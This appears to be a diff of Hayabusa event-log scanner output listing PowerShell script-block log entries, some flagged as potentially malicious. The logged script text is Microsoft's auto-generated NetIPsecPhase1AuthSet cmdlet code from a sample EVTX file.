[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains 